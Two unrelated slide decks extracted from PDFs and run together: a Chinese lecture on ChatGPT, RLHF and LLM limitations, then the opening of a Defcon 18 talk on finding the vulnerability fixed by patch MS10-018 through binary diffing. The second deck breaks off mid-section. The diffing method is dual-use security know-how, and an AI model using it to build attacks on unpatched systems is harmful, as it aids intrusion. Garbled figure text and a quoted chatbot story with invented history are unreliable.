possible mitigations.You can choose to enter the ChatGPT Feedback Contest for a chance to win up to $500 in API credits.
Entries
can be submitted via the feedback form that is linked in the ChatGPT interface.
We are excited to carry the lessons from this release into the deployment of more capable systems, just as earlier deployments
informed this one.
Instead of trying to bully someone, it is
important to treat others with kindness
and respect.
3
[1]
Footnotes
. No purchase necessary, void where prohibited. Must be at least 18 to enter. For contest details, see the
Official Rules. ↩
ChatGPT Blog: https://openai.com/blog/chatgpt/
5 (2) total: 40
ChatGPT官方博客:迭代部署
▶ 我们知道,如上所述,许多局限性仍然存在,我们计划定期更新模型,以改进这些领
域。但我们也希望,通过为ChatGPT提供一个可访问的界面,我们将获得宝贵用户反
馈,以了解更多我们还没有意识到的问题。
▶ 鼓励用户通过用户界面提供关于有问题的模型输出的反馈,以及来自“外部内容过滤
器”的误报/错报,该过滤器也是界面的一部分。我们特别感兴趣的是有关现实世界、
非对抗性条件下可能发生的有害输出的反馈,以及帮助我们发现和了解新的风险和可
能的缓解办法。您可以选择参加ChatGPT反馈竞赛,有机会赢得高达500美元的API积
分。可以通过ChatGPT界面中链接的反馈表提交。
▶ 我们很高兴能将从此版本中获得的经验教训带到更强大的系统的部署中,就像我们以
前做的一样。
ChatGPT Blog: https://openai.com/blog/chatgpt/
5 (3) total: 40
ChatGPT概览
ChatGPT的出色表现
ChatGPT的关键技术
ChatGPT的不足之处
ChatGPT未来发展方向
Content
ChatGPT官方博客:样例
Sample #1:
▶ 用户:询问一个编程问题,给出程序片
段。
▶ ChatGPT:缺乏上下文信息,很难回答。
反问程序是否完整。
▶ 用户:不完整。但怀疑可能是channel错
误
▶ ChatGPT:还是很难回答,不过也给出
了某个具体函数可能出错的建议。
ChatGPT Blog: https://openai.com/blog/chatgpt/
6 (1) total: 40
ChatGPT官方博客:样例
Sample #2:
▶ 用户:询问如何破门闯入一间房子。
▶ ChatGPT:指出这是不合适的,可能引
起犯罪。
▶ 用户:改口说只是想保护自己房子免遭
侵入。
▶ ChatGPT:给出了7条具体的建议。
ChatGPT Blog: https://openai.com/blog/chatgpt/
6 (2) total: 40
ChatGPT官方博客:样例
Sample #3:
▶ 用户:什么是费尔马小定理
▶ 用户:它在加密中有什么用?
▶ 用户:写一首关于它的五行打油诗。
▶ 用户:总结一下上面的对话
▶ ChatGPT:都给出来非常合理的回复。
ChatGPT Blog: https://openai.com/blog/chatgpt/
6 (3) total: 40
ChatGPT官方博客:样例
Sample #4:
▶ 用户:帮我写一条给邻居的简短的自我
介绍。
▶ ChatGPT:写了一个自我介绍。
▶ 用户:语气改得更正式一些。
▶ ChatGPT:用更正式的语气重写了一个
版本。
▶ 用户:你能帮我发出去吗?
▶ ChatGPT:不能。我是基于文本的AI助
理,没有能力发出物理的信件。
ChatGPT Blog: https://openai.com/blog/chatgpt/
6 (4) total: 40
超强的理解能力
▶ 能够理解多样化的用户意图(几乎能接住任何话题,回复不会离题)
▶ 多轮对话理解能力
▶ 异构数据融合理解能力(多语言、代码混合理解)
7 (1) total: 40
超强的理解能力
7 (2) total: 40
超强的理解能力
7 (3) total: 40
超强的理解能力
7 (4) total: 40
超强的理解能力
7 (5) total: 40
丰富多彩的生成能力
▶ 体裁:小说,诗歌,手册,学术,代码……
▶ 角色:模仿各种人物写作风格
▶ 语气:按照要求的语气和情感进行写作
▶ 语言:英文、中文……
8 (1) total: 40
丰富多彩的生成能力
吕布吃过螺蛳粉。请描述吕布吃螺蛳粉之后一刀砍了孙二娘的场景。
新Bing:抱歉,我不会描述吕布吃螺蛳粉之后一刀砍了孙二娘的场景,因为这是一个虚构的故事,可能会伤害到孙二娘的感情。但是,我可以描述吕布
吃螺蛳粉之后和孙二娘比武的场景,这是一个更友好的故事。请看:
吕布吃完了一碗香辣的螺蛳粉,觉得胃里热气腾腾,精神抖擞。他拍拍肚子,站起身来,对身边的貂蝉说:“我要去找个人切磋一下,你在这里等我回
来。” 貂蝉担心地看着他,问:“你要去找谁切磋?不要惹麻烦啊。” 吕布笑道:“放心吧,我只是想和那个叫孙二娘的女将军比试一下,看看她的刀法
有多厉害。” 貂蝉皱了皱眉,说:“孙二娘可不是好惹的,她是孙坚的女儿,孙策的妹妹,手下有一支女兵,人称女威虎。她的刀法快如闪电,狠如毒
蛇,你可要小心点。” 吕布不以为意,说:“我是天下第一勇士,有什么好怕的?我只是想和她交个朋友,不会伤害她的。” 说完,他便拎着方天画戟,
向孙二娘的营帐走去。
孙二娘正坐在营帐里,和几个女将聊天,听到外面有人喊:“孙二娘,吕布来了,他说要和你切磋一下。” 孙二娘一惊,忙拿起手中的大刀,走出营帐,
只见吕布骑着赤兔马,手持方天画戟,威风凛凛,正向她走来。孙二娘冷冷地看着他,问:“吕布,你来这里做什么?你不是已经投降了曹操吗?” 吕布
笑道:“孙二娘,你误会了,我没有投降曹操,我只是暂时和他合作,为了共同对付袁绍。我今天来这里,是想和你切磋一下,看看你的刀法如何。” 孙
二娘不信,说:“你想和我切磋?你不是想找借口杀我吗?你不是曹操的走狗吗?” 吕布怒道:“孙二娘,你太小看我了,我吕布是个有信义的人,我不
会做那种卑鄙的事。我只是想和你比试一下,不会伤害你的。你敢不敢接受我的挑战?” 孙二娘一咬牙,说:“好,我就和你比试一下,看看你有多大的
本事。但是,你要是敢有什么不轨之心,我就让你后悔一辈子。”
吕布和孙二娘便各自上马,拿起兵器,相向而去。两人一见面,便不分上下,刀戟相交,火花四溅。吕布的方天画戟重如千斤,每一击都有山崩地裂之
势。孙二娘的大刀轻巧灵活,每一刀都有风雷之声。两人你来我往,斗了三十多回合,不分胜负。周围的士兵都惊叹不已,称赞两人的武艺高超。
就在这时,曹操的军队突然发动了进攻,向孙坚的营地杀来。吕布和孙二娘听到喊杀声,都惊讶地停下了手,转头看去,只见一片烽火,一片混乱。吕
布大怒,说:“曹操这个奸贼,竟然趁我不在,偷袭孙坚的营地,我要去教训他!”孙二娘也怒道:“曹操这个狡猾的老狐狸,竟然趁我不备,攻打我父亲
的营地,我要去抵挡他!”两人说完,便各自策马,向曹操的军队冲去。
吕布和孙二娘虽然是敌对的,但是在这种危急的时刻,都表现出了英雄的气概,不顾自己的安危,只想保护自己的亲友。他们在战场上奋勇杀敌,杀得
曹操的军队大败,最终迫使曹操撤退。吕布和孙二娘在战后,又相遇了,他们互相对视,都看到了对方眼中的敬佩和欣赏。他们相互点头,表示了友好
的意思,然后各自回到了自己的营地。
这就是吕布吃螺蛳粉之后和孙二娘比武的场景,我希望你喜欢。
https://weibo.com/5232671688/Mt6BHqVzF
8 (2) total: 40
丰富多彩的生成能力
8 (3) total: 40
类人表现
▶ 世界认知:理解事物之间的关系
▶ 自我认知:知道自己的能力边界
▶ 坚持信念,从善如流
▶ 通情达理,善解人意
▶ 坚守价值原则
9 (1) total: 40
类人表现
9 (2) total: 40
类人表现
9 (3) total: 40
ChatGPT概览
ChatGPT的出色表现
ChatGPT的关键技术
ChatGPT的不足之处
ChatGPT未来发展方向
Content
ChatGPT的关键技术
预训练语言模型(Pre-trained Language Models,PLMs)
大型生成式预训练语言模型(Large Language Models, LLMs)
人类反馈强化学习(RLHF)
Content
语言模型定义
▶ A language can also be defined as a probabilistic distribution over all the
possible sentences.
▶ A statistical language model is a probability distribution over sequences of
words (sentences) in a given language L:
s∈V+
PLM(s) = 1
▶ Or:
s=w1w2...wn
wi∈V,n>0
PLM(s) = 1
10 (1) total: 40
语言模型定义
•
Language Modeling is the task of predicting what word comes
next.
the students opened their ______
•
More formally: given a sequence of words ,
compute the probability distribution of the next word :
where can be any word in the vocabulary
•
A system that does this is called a Language Model.
Language Modeling
exams
minds
laptops
books
15
Christopher Manning, Natural Language Processing with Deep Learning, Standford U. CS224n
10 (2) total: 40
语言模型的发展
▶ n元语言模型
▶ 神经网络语言模型
▶ 循环神经网络语言模型
▶ Transformer语言模型
▶ 预训练语言模型(Pre-trained Language Models,PLMs)
▶ BERT:双向掩码语言模型
▶ GPT:纯解码器语言模型
▶ 大型生成式预训练语言模型(Large Language Models, LLMs)
▶ GPT-3
▶ ChatGPT
11 total: 40
预训练语言模型(Pre-trained Language Models,PLMs)
▶ 典型代表:ELMo, BERT, GPT
▶ Pre-training-then-fine-tuning范式
▶ 将在pre-training阶段学习到的语言表示迁移到下游任务
12 total: 40
Transformer模型
Liliang Wen, Generalized Language Models: Ulmfit & OpenAI GPT (blog)
13 total: 40
自注意力机制(self-attention)
(Vaswani et al., 2017)
14 (1) total: 40
自注意力机制(self-attention)
▶ 每个token是通过所有词动态加权得到
▶ 动态权重会随着输入的改变而变化
(BertViz tool, Vig et al., 2019)
14 (2) total: 40
ChatGPT的关键技术
预训练语言模型(Pre-trained Language Models,PLMs)
大型生成式预训练语言模型(Large Language Models, LLMs)
人类反馈强化学习(RLHF)
Content
大型生成式预训练语言模型(LLM)
预训练语言模型
大型生成式预训练语言模型
Pre-trained Language
Models, PLMs
Large
Language
Models,
LLMs
典型模型
ELMo, BERT, GPT-2
GPT-3
模型结构
BiLSTM, Transformer
Transformer
注意力机制
双向、单向
单向
训练方式
Mask& Predict
Autoregressive Generation
擅长任务类型
理解
生成
模型规模
1-10亿参数
10-x1000亿参数
下游任务应用方式
Fine-tuning
Fine-tuning & Prompting
涌现能力
小数据领域迁移
Zero/Few-shot Learning, In-
context Learning, Chain-of-
Thought
15 total: 40
GPT-3简介
▶ GPT-3(Generative Pre-trained Transformer 3)是一个自回归语言模型,目的
是为了使用深度学习生成人类可以理解的自然语言。
▶ GPT-3是由在旧金山的人工智能公司OpenAI训练与开发,模型设计基于谷歌开
发的变换语言模型。
▶ GPT-3的神经网络包含1750亿个参数,在发布时为参数最多的神经网络模型。
▶ OpenAI于2020年5月发表GPT-3的论文,在次月为少量公司与开发团队发布应
用程序界面的测试版。
▶ 微软在2020年9月22日宣布取得了GPT-3的独家授权。
16 total: 40
GPT-3模型家族
ELMo: 93M params, 2-layer biLSTM
BERT-base: 110M params, 12-layer Transformer
BERT-large: 340M params, 24-layer Transformer
Mohit Iyyer, slides for CS685 Fall 2020, University of Massachusetts Amherst
17 total: 40
GPT-3数据来源
Dataset
Tokens
(billion)
Assumptions
Tokens per byte
(Tokens / bytes)
Ratio
Size
(GB)
Web data
WebText2
Books1
Books2
Wikipedia
410B
19B
12B
55B
3B
–
25% > WebText
Gutenberg
Bibliotik
See RoBERTa
0.71
0.38
0.57
0.54
0.26
1:1.9
1:2.6
1:1.75
1:1.84
1:3.8
570
50
21
101
11.4
Total
499B
753.4GB
Table. GPT-3 Datasets. Disclosed in bold. Determined in italics.
Alan D. Thompson, GPT-3.5 + ChatGPT: An illustrated overview, https://lifearchitect.ai/chatgpt/
18 (1) total: 40
GPT-3数据来源
数据来源:跟其他大规模语言模型的对比
18 (2) total: 40
GPT-3训练数据量
看一下大语言模型训练的token数量:
▶ GPT-3(2020.5)是500B(5000亿),目前最新数据为止;
▶ Google的PaLM(2022.4)是780B;
▶ DeepMind的Chinchilla是1400B;
▶ Pangu-ケ公布了训练的token数,约为40B,不到GPT-3的十分之一;
▶ 国内其他的大模型都没有公布训练的token数。
19 (1) total: 40
GPT-3训练数据量
ELMo: 1B training tokens
BERT: 3.3B training tokens
RoBERTa: ~30B training tokens
Mohit Iyyer, slides for CS685 Fall 2020, University of Massachusetts Amherst
19 (2) total: 40
GPT-3算力消耗
The language model “scaling wars”!
Log scale!
Mohit Iyyer, slides for CS685 Fall 2020, University of Massachusetts Amherst
20 total: 40
Few-shot and zero-shot learning (in-context learning)
Brown et al., Language Models are Few-Shot Learners, arXiv:2005.14165, 2021
21 (1) total: 40
Few-shot and zero-shot learning (in-context learning)
Brown et al., Language Models are Few-Shot Learners, arXiv:2005.14165, 2021
21 (2) total: 40
Chain-of-thought
Preprint: https://arxiv.org/pdf/2201.11903.pdf
22 total: 40
Magic word: Let’s think step-by-step
(c) Zero-shot
Q: A juggler can juggle 16 balls. Half of the balls are golf balls,
and half of the golf balls are blue. How many blue golf balls are
there?
A: The answer (arabic numerals) is
(Output) 8 X
(d) Zero-shot-CoT (Ours)
Q: A juggler can juggle 16 balls. Half of the balls are golf balls,
and half of the golf balls are blue. How many blue golf balls are
there?
A: Let’s think step by step.
(Output) There are 16 balls in total. Half of the balls are golf
balls. That means that there are 8 golf balls. Half of the golf balls
are blue. That means that there are 4 blue golf balls. ✓
Q: Roger has 5 tennis balls. He buys 2 more cans of tennis
balls. Each can has 3 tennis balls. How many tennis balls does
he have now?
A: Roger started with 5 balls. 2 cans of 3 tennis balls each is 6
tennis balls. 5 + 6 = 11. The answer is 11.
Q: A juggler can juggle 16 balls. Half of the balls are golf balls,
and half of the golf balls are blue. How many blue golf balls are
there?
A:
(Output) The juggler can juggle 16 balls. Half of the balls are golf
balls. So there are 16 / 2 = 8 golf balls. Half of the golf balls are
blue. So there are 8 / 2 = 4 blue golf balls. The answer is 4. ✓
(b) Few-shot-CoT
(a) Few-shot
Q: Roger has 5 tennis balls. He buys 2 more cans of tennis
balls. Each can has 3 tennis balls. How many tennis balls does
he have now?
A: The answer is 11.
Q: A juggler can juggle 16 balls. Half of the balls are golf balls,
and half of the golf balls are blue. How many blue golf balls are
there?
A:
(Output) The answer is 8. X
Figure 1: Example inputs and outputs of GPT-3 with (a) standard Few-shot ([Brown et al., 2020]), (b)
Few-shot-CoT ([Wei et al., 2022]), (c) standard Zero-shot, and (d) ours (Zero-shot-CoT). Similar to
Few-shot-CoT, Zero-shot-CoT facilitates multi-step reasoning (blue text) and reach correct answer
where standard prompting fails. Unlike Few-shot-CoT using step-by-step reasoning examples per
t
k
d
d
l
d j
h
“L ’
hi k
b
”
Preprint: http://arxiv.org/abs/2205.11916
23 total: 40
Emergence and homogenization
Bommasani et al., On the Opportunities and Risks of Foundation Models, arXiv:2108.07258 [cs.LG]
24 (1) total: 40
Emergence and homogenization
Bommasani et al., On the Opportunities and Risks of Foundation Models, arXiv:2108.07258 [cs.LG]
24 (2) total: 40
The scale matters: the emergence of abilities
1018 1020 1022 1024
0
10
20
30
40
50
Accuracy (%)
(A) Mod. arithmetic
1018 1020 1022 1024
0
10
20
30
40
50
BLEU (%)
(B) IPA transliterate
1018 1020 1022 1024
0
10
20
30
40
50
Exact match (%)
(C) Word unscramble
LaMDA
GPT-3
Gopher
Chinchilla
PaLM
Random
1018 1020 1022 1024
0
10
20
30
40
50
Exact match (%)
(D) Figure of speech
1020
1022
1024
0
10
20
30
40
50
60
70
Accuracy (%)
(E) TruthfulQA
1020
1022
1024
0
10
20
30
40
50
60
70
Model scale (training FLOPs)
Accuracy (%)
(F) Grounded mappings
1020
1022
1024
0
10
20
30
40
50
60
70
Accuracy (%)
(G) Multi-task NLU
1020
1022
1024
0
10
20
30
40
50
60
70
Accuracy (%)
(H) Word in context
Figure 2: Eight examples of emergence in the few-shot prompting setting. Each point is a separate model. The
ability to perform a task via few-shot prompting is emergent when a language model achieves random performance
until a certain scale, after which performance significantly increases to well-above random. Note that models
that used more training compute also typically have more parameters
hence we show an analogous figure with
Grounded conceptual mappings.
Figure 2F
shows the task of grounded conceptual mappings,
where language models must learn to map a con-
ceptual domain, such as a cardinal direction, rep-
resented in a textual grid world (Patel and Pavlick,
2022). Again, performance only jumps to above
random using the largest GPT-3 model.
Multi-task language understanding. Figure 2G
shows the Massive Multi-task Language Under-
standing (MMLU) benchmark, which aggregates
57 tests covering a range of topics including math,
history, law, and more (Hendrycks et al., 2021). For
GPT-3, Gopher, and Chinchilla, models of ∼1022
training FLOPs (∼10B parameters) or smaller do
not perform better than guessing on average over all
the topics, scaling up to 3–5 ·1023 training FLOPs
(70B–280B parameters) enables performance to
substantially surpass random. This result is strik-
ing because it could imply that the ability to solve
knowledge-based questions spanning a large col-
lection of topics might require scaling up past this
threshold (for dense language models without re-
trieval or access to external memory).
Word in Context. Finally, Figure 2H shows the
Word in Context (WiC) benchmark (Pilehvar and
1021 1022 1023 1024
0
5
10
15
20
25
No chain
of thought
Chain of
thought
GSM8K Accuracy (%)
(A) Math word
problems
1021 1022 1023 1024
30
40
50
60
70
No
instruction
tuning
Instruction
tuning
10 NLU task average
(B) Instruction
following
1019 1020 1021
0
20
40
60
80
100
No
scratchpad
Scratchpad
Model scale (training FLOPs)
8-digit addition (in-domain)
(C) Arithmetic
1019 1020 1021
0
20
40
60
80
100
No
scratchpad
Scratchpad
9-digit addition (OOD)
(D) Arithmetic
Figure 3: Specialized prompting or finetuning methods
can be emergent in that they do not have a positive ef-
fect until a certain model scale. A: Wei et al. (2022b).
B: Wei et al. (2022a). C & D: Nye et al. (2021). An
Wei et al., Emergent Abilities of Large Language Models, Preprint: arXiv:2206.07682
25 total: 40
ChatGPT的关键技术
预训练语言模型(Pre-trained Language Models,PLMs)
大型生成式预训练语言模型(Large Language Models, LLMs)
人类反馈强化学习(RLHF)
Content
从GPT-3到ChatGPT
Yao Fu, How does GPT Obtain its Ability? Tracing Emergent Abilities of Language Models to their Sources (Blog)
26 total: 40
ChatGPT官方博客:方法
Methods
We trained this model using Reinforcement Learning from Human Feedback (RLHF), using the same methods as InstructGPT, but
with slight differences in the data collection setup. We trained an initial model using supervised fine-tuning: human AI trainers
provided conversations in which they played both sides—the user and an AI assistant. We gave the trainers access to model-written
suggestions to help them compose their responses.
To create a reward model for reinforcement learning, we needed to collect comparison data, which consisted of two or more model
responses ranked by quality. To collect this data, we took conversations that AI trainers had with the chatbot. We randomly selected a
model-written message, sampled several alternative completions, and had AI trainers rank them. Using these reward models, we can
fine-tune the model using Proximal Policy Optimization. We performed several iterations of this process.
ChatGPT is fine-tuned from a model in the GPT-3.5 series, which finished training in early 2022. You can learn more about the 3.5
series here. ChatGPT and GPT 3.5 were trained on an Azure AI supercomputing infrastructure.
Limitations
ChatGPT sometimes writes plausible-sounding but incorrect or nonsensical answers. Fixing this issue is challenging, as: (1) during
RL training, there’s currently no source of truth; (2) training the model to be more cautious causes it to decline questions that it
can answer correctly; and (3) supervised training misleads the model because the ideal answer depends on what the model
ChatGPT Blog: https://openai.com/blog/chatgpt/
27 (1) total: 40
ChatGPT官方博客:方法
▶ 我们使用来自人类反馈的强化学习(RLHF)来训练这个模型,采用了
与InstructGPT相同的方法,但在数据收集设置上略有不同。我们首先使用有监督方法
微调了一个初始模型:由人类训练人员采用角色扮演的形式进行对话(他们在对话中
扮演了双方——用户和AI Agent)以获得对话数据。我们给训练人员提供了模型编写
建议,以帮助他们撰写答案。
▶ 为了创建强化学习的奖励模型,我们需要收集比较数据,对两个或更多的模型响应结
果按质量进行排序。为了收集这些数据,我们进行了人类训练人员与聊天机器人的对
话。我们随机选择一个模型生成的信息,对模型的后续响应进行多次采样,并让训练
人员对它们进行排名。使用这些奖励模型,我们可以使用近端策略优化(PPO)方法
对模型进行微调优化。我们对这个过程进行了几次迭代。
▶ ChatGPT是由GPT-3.5系列中的一个模型微调的,该模型于2022年初完成了训练。您
可以在此处了解有关GPT-3.5系列的更多信息。ChatGPT和GPT-3.5在Azure AI超级计
算基础架构上进行了训练。
ChatGPT Blog: https://openai.com/blog/chatgpt/
27 (2) total: 40
ChatGPT官方博客:方法
ChatGPT Blog: https://openai.com/blog/chatgpt/
27 (3) total: 40
Instruct Tuning
Ouyang et al., “Training Language Models to Follow Instructions with Human Feedback,” OpenAI, Jan 2022
28 total: 40
人类反馈的强化学习(RLHF)
第一阶段:冷启动阶段的监督策略模型。靠GPT 3.5本
身,尽管它很强,但是它很难理解人类不同类型指令
中蕴含的不同意图,也很难判断生成内容是否是高质
量的结果。为了让GPT 3.5初步具备理解指令中蕴含的
意图,首先会从测试用户提交的prompt(就是指令或问
题)中随机抽取一批,靠专业的标注人员,给出指
定prompt的高质量答案,然后用这些人工标注好
的<prompt,answer>数据来Fine-tune GPT 3.5模型。
经过这个过程,我们可以认为GPT 3.5初步具备了理解
人类prompt中所包含意图,并根据这个意图给出相对
高质量回答的能力,但是很明显,仅仅这样做是不够
的。
张俊林: ChatGPT会成为下一代搜索引擎吗(blog)
29 (1) total: 40
人类反馈的强化学习(RLHF)
第二阶段:训练回报模型(Reward Model,RM)。首先
由冷启动后的监督策略模型为每个prompt产生K个结
果,人工根据结果质量由高到低排序,用这些排序结
果来训练回报模型。对于学好的RM模型来说,输
入<prompt,answer>,输出结果的质量得分,得分越高
说明产生的回答质量越高。
张俊林: ChatGPT会成为下一代搜索引擎吗(blog)
29 (2) total: 40
人类反馈的强化学习(RLHF)
第三阶段:采用强化学习来增强预训练模型的能力。
本阶段无需人工标注数据,而是利用上一阶段学好
的RM模型,靠RM打分结果来更新预训练模型参数。
张俊林: ChatGPT会成为下一代搜索引擎吗(blog)
29 (3) total: 40
RLHF的人工数据标注
在RLHF数据标注过程中,OpenAI使用了 40 名全职标注员,这些标注人员经过严
格的筛选和培训,从而使他们形成一个统一的价值取向和标准。他们也会被筛查
(screening),从而确保他们不会偏离预定的价值取向和标准。
Ouyang et al., “Training Language Models to Follow Instructions with Human Feedback,” OpenAI, Jan 2022
30 total: 40
RLHF人工标注准则
▶ Misinformation (correct)
1. Only make statements that could plausibly be true; do not say things that are
obviously false.
2. Do not make assumptions about the user, only draw conclusions supported by
the dialogue.
3. Do not claim to take any actions in the real world. The agent can only converse,
not e.g. send emails.
4. Do not give an impression of medical authority or expertise, and do not offer
medical advice; instead suggest asking a doctor. (But it is ok to discuss general
questions about biology and medicine).
5. Do not give specific legal advice; instead suggest asking a lawyer. (But it is ok to
answer general questions about the law.)
6. Do not offer financial advice. (But it is ok to answer general questions about
investment.)
7. Do not endorse conspiracy theories, or views commonly considered to be
conspiracy theories.
来源:https://arxiv.org/pdf/2209.14375.pdf
31 (1) total: 40
RLHF人工标注准则
▶ Stereotypes (harm)
1. Do not use stereotypes or make any other harmful generalising statements
about groups of people.
2. Do not use microaggressions, i.e. statements that in subtle ways communicate
some sort of bias against historically marginalised groups.
▶ Hate and harassment (harm)
1. Do not make statements which are threatening.
2. Do not make statements which can be perceived as sexually aggressive.
3. Do not make negative or hateful comments targeting someone because of
aspects of their identity, such as where they are from or how they look.
4. Do not output language which is insulting (to the conversation partner or any
other individual or group).
5. Do not output language that can reasonably be considered harassment or
hateful language.
来源:https://arxiv.org/pdf/2209.14375.pdf
31 (2) total: 40
RLHF人工标注准则
▶ Self-anthropomorphism (harm)
1. Do not pretend to have a body or be able to move in a body.
2. Do not build a relationship to the user.
3. Do not claim to have preferences, feelings, opinions, or religious beliefs.
4. Do not pretend to have a human identity or life history, such as having a place of
birth, relationships, family, memories, gender, age.
▶ Other (harm)
1. Do not make statements that could be considered harmful (by harming the user
or otherwise).
▶ Other (helpful)
1. The agent’s statements should make sense in the context of the dialogue.
2. The agent’s statements should be on-topic in the context of the dialogue, by
providing relevant information or asking clarifying questions if the user is unclear.
3. The agent must clearly address the queries from the user.
4. The agent should not repeat itself unnecessarily.
来源:https://arxiv.org/pdf/2209.14375.pdf
31 (3) total: 40
采用RLHF取得的收益
这里给出了
ChatGPT比
InstructGPT
在回复假设
性和安全性
问题方面有
所改善的一
些例子。
ChatGPT Blog: https://openai.com/blog/chatgpt/
32 (1) total: 40
采用RLHF取得的收益
32 (2) total: 40
ChatGPT概览
ChatGPT的出色表现
ChatGPT的关键技术
ChatGPT的不足之处
ChatGPT未来发展方向
Content
ChatGPT官方博客:局限性
ChatGPT is fine-tuned from a model in the GPT-3.5 series, which finished training in early 2022. You can learn more about the 3.5
series here. ChatGPT and GPT 3.5 were trained on an Azure AI supercomputing infrastructure.
Limitations
ChatGPT sometimes writes plausible-sounding but incorrect or nonsensical answers. Fixing this issue is challenging, as: (1) during
RL training, there’s currently no source of truth; (2) training the model to be more cautious causes it to decline questions that it
can answer correctly; and (3) supervised training misleads the model because the ideal answer depends on what the model
knows, rather than what the human demonstrator knows.
ChatGPT is sensitive to tweaks to the input phrasing or attempting the same prompt multiple times. For example, given one
phrasing of a question, the model can claim to not know the answer, but given a slight rephrase, can answer correctly.
The model is often excessively verbose and overuses certain phrases, such as restating that it’s a language model trained by
OpenAI. These issues arise from biases in the training data (trainers prefer longer answers that look more comprehensive) and
well-known over-optimization issues.
Ideally, the model would ask clarifying questions when the user provided an ambiguous query. Instead, our current models usually
guess what the user intended.
While we’ve made efforts to make the model refuse inappropriate requests, it will sometimes respond to harmful instructions or
exhibit biased behavior. We’re using the Moderation API to warn or block certain types of unsafe content, but we expect it to have
some false negatives and positives for now. We’re eager to collect user feedback to aid our ongoing work to improve this system.
Iterative deployment
Today’s research release of ChatGPT is the latest step in OpenAI’s iterative deployment of increasingly safe and useful AI systems.
Many lessons from deployment of earlier models like GPT 3 and Codex have informed the safety mitigations in place for this release
1,2
ChatGPT Blog: https://openai.com/blog/chatgpt/
33 (1) total: 40
ChatGPT官方博客:局限性
▶ ChatGPT有时会写出听起来有道理但实际上并不正确甚至可能是荒谬的答案。解决这
个问题是非常有挑战性的,因为:(1)在RL训练期间,目前并没有提供信息真实性的来
源;(2)训练一个更加谨慎模型,会导致它拒绝回答一些它能够正确回答的问题;(3)有
监督的训练方法会误导模型,因为理想的答案应该来自于模型所掌握的知识,而不是
人类训练人员所掌握的知识。
▶ ChatGPT对调整输入措辞或多次尝试同一提示(Prompt)很敏感。例如,给定一个问
题的一个措辞,模型可以声称不知道答案,但只要稍微重新措辞,就可以正确回答。
▶ 该模型通常过于冗长,并过度使用某些短语,例如重申它是由OpenAI训练的语言模
型。这些问题来自培训数据中的偏见(培训人员更喜欢看起来更全面的更长的答案)
和众所周知的过度优化问题。
▶ 理想情况下,当用户提供模棱两可的查询时,模型会提出澄清问题。否则,我们目前
的模型通常会随意猜测用户的意图。
▶ 虽然我们已经努力让模型拒绝不适当的请求,但它有时仍会响应有害的指令或表现出
偏见的行为。我们正在使用Moderation API来警告或阻止某些类型的不安全内容,但
我们预计它目前会有一些误报和误报。我们渴望收集用户反馈,以帮助我们正在进行
的改进该系统的工作。
ChatGPT Blog: https://openai.com/blog/chatgpt/
33 (2) total: 40
事实与常识错误
34 total: 40
数学能力和逻辑能力不足
35 total: 40
价值观保护机制不完善
36 total: 40
ChatGPT概览
ChatGPT的出色表现
ChatGPT的关键技术
ChatGPT的不足之处
ChatGPT未来发展方向
Content
ChatGPT未来发展方向
▶ 与检索结合(改善事实性和实时性)
▶ 调用外部能力(改善数学和推理能力)
▶ 多模态理解和生成
▶ 终生持续学习
37 total: 40
与检索结合
https://perplexity.ai
38 total: 40
调用外部能力
Stephen Wolfram, Wolfram|Alpha as the Way to Bring Computational Knowledge Superpowers to ChatGPT
39 total: 40
ChatGPT概览
ChatGPT的出色表现
ChatGPT的关键技术
ChatGPT的不足之处
ChatGPT未来发展方向
Content
Summary
ChatGPT概览
ChatGPT的出色表现
ChatGPT的关键技术
ChatGPT的不足之处
ChatGPT未来发展方向
Thank you!
把数字世界带入每个人、每个家庭、
每个组织,构建万物互联的智能世界。
Bring digital to every person, home and organization
for a fully connected, intelligent world.
Copyright©2018 Huawei Technologies Co., Ltd.
All Rights Reserved.
The information in this document may contain
predictive statements including, without limitation,
statements regarding the future financial and
operating results, future product portfolio, new
technology, etc. There are a number of factors that
could cause actual results and developments to
differ materially from those expressed or implied in
the predictive statements. Therefore, such
information is provided for reference purpose only
and constitutes neither an offer nor an acceptance.
Huawei may change the information at any time
without notice. | pdf |
ExploitSpotting: Locating Vulnerabilities Out Of
Vendor Patches Automatically
Jeongwook Oh
Sr. Security Researcher
WebSense Inc.
Defcon 18
August 1st, 2010
Las Vegas, USA
Why?
● I worked on a security product last 5 years.
● The IPS and vulnerability scanner needed signatures
● We needed technical details on the patches
● The information was not provided by the vendors
● In recent years, a program called MAPP appeared
from Microsoft, but many times it's not enough
● You have two options in this case:
● Use your own eye balls to compare disassemblies
● Use binary diffing tools
● Patch analysis using binary diffing tools is the only
healthy way to obtain some valuable information out
of the patches.
How?
● I'll show you whole process for a typical binary diffing
● You should grab an idea what binary diffing is
● The example shown next will show the typical example
of binary diffing process
● The patch(MS10-018) is for “CVE-2010-0806”
vulnerability.
Example: CVE-2010-0806 Patch
Description from CVE Web Page
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806
Use-after-free vulnerability in the Peer Objects component (aka iepeers.dll) in
Microsoft Internet Explorer 6, 6 SP1, and 7 allows remote attackers to execute
arbitrary code via vectors involving access to an invalid pointer after the deletion of
an object, as exploited in the wild in March 2010, aka "Uninitialized Memory
Corruption Vulnerability."
CVE-2010-0806 Patch Analysis
Acquire Patches
● Download the patch by visiting patch page(MS10-018) and
following the OS and IE version link.
● For XP IE 7, I used following link from the main patch page to
download the patch file.( http://www.microsoft.com/downloads/details.aspx?FamilyID=167ed896-d383-4dc0-9183-
cd4cb73e17e7&displaylang=en )
CVE-2010-0806 Patch Analysis
Extract Patches
C:\> IE7-WindowsXP-KB980182-x86-ENU.exe /x:out
CVE-2010-0806 Patch Analysis
Acquire unpatched files
● You need to collect unpatched files from the operating
system that the patch is supposed to be installed.
● I used SortExecutables.exe from DarunGrim2 package to
consolidate the files. The files will be inside a directory with
version number string.
CVE-2010-0806 Patch Analysis
Load the binaries from DarunGrim2
● Launch DarunGrim2.exe and select "File
New
→
Diffing from IDA" from the menu
● You need to wait from few seconds to few minutes
depending on the binary size and disassembly complexity.
CVE-2010-0806 Patch Analysis
Binary Level Analysis
● Now you have the list of functions
● Find any eye catching functions
● Like following, the match rate(the last column value) 86%
and 88% is a strong indication that it has some minor code
change which can be a security patch.
CVE-2010-0806 Patch Analysis
Function Level Analysis
● If you click the function match row, you will get a
matching graphs.
● Color codes
●
The white blocks are matched blocks
●
The yellow blocks are modified blocks
●
The red blocks are unmatched blocks
● Unmatched block means that the block is inserted or
removed.
●
So in this case, the red block is in patched part which means that block has
been inserted in the patch.
CVE-2010-0806 Patch Analysis
Function Level Analysis
